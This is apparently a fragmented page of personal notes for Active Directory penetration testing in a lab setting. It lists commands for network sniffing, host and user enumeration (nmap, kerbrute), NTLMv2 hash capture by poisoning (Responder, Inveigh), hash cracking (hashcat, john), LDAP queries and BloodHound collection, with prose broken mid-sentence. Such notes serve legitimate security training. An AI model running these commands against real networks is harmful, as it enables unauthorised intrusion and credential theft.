Hack. Eat. Sleep. Repeat!!!
sudo wireshark -E enss224 -A
sudo tcpdump -i ens224
fping
,Fping provides us with a similar capability as the standard ping application in that it utilizes ICMP requests and replies to reach out and interact with a host.fping -asgq 172.16.5.0/23
sudo nmap -A -iL hosts.txt -oN result2
jsmith.txt
and jsmith2.txt
to brute force itkerbrute
precompiled releaseskerbrute userenum -d <DOMAIN> --dc 172.16.5.5 jsmith.txt -o valid_ad_users
sudo responder -I ens224
hashcat -m 5600 forend_ntlmv2 /usr/share/wordlists/rockyou.txt
john --wordlist=[] hash.txt
/usr/share/responder/logs
-:powershell start powershell -v runAs
.Using Inveigh-:Invoke-Module .\Inveigh.ps1
Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput Y
.\Inveigh.exe
GET NTLMV2UNIQUE
.GET NTLMV2USERNAMES
and see which usernames we have collected.ldapsearch -x -H ldap://[ip] -b 'dc=support,dc=htb' -D "support\ldap" -W 'objectClass=user'
objectClass=user
ldapsearch -x -H ldap://[ip] -b 'dc=support,dc=htb' -D "support\ldap" -W 'objectClass=user'
-n
to prevent newline in text file.Use -y
to specify passwd file.ldapsearch -x -H ldap://support.htb -b 'dc=support,dc=htb' -D "support\ldap" -W 'objectClass=user' -y passwd
echo -n "password" > passwd
chmod 600 passwd
ldapsearch -x -H ldap://support.htb -b 'cn=support,cn=users,dc=support,dc=htb' -D "support\ldap" '(objectClass=user)' -y passwd
ldapsearch -x -H ldap://support.htb -b 'dc=support,dc=htb' -D "support\ldap" '(objectClass=group)'
ldapsearch -x -H ldap://support.htb -b 'dc=support,dc=htb' -D "support\ldap" '(objectClass=computer)' -y passwd
ldapsearch -x -H ldap://support.htb -b 'dc=support,dc=htb' -D "support\ldap" '(sAMAccountName=*)' -y passwd
pip install bloodhound-ce #community edition
pip install bloodhound #legaacy version
#same syntax tho
[-c -> 'all']
-:bloodhound-ce-python -u [user@domain] -p '[password]' -ns [nameserver / IP] -d [domain] -c [collection method]